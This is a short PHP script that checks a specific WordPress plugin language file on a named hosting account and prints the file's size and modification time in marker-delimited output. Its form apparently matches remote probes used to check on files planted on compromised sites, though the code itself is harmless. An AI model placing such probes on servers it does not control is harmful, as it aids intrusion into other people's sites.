<?php $p = "/home/turkishi/public_html/new.turkishinternationalschools.com/wp-content/plugins/advanced-custom-fields/lang/acf-fa_IR.l10n.php"; if (file_exists($p)) { $fs = filesize($p); $ft = filemtime($p); die("!cfs:{$fs};cft:{$ft}!"); } else { die('!not_found!'); }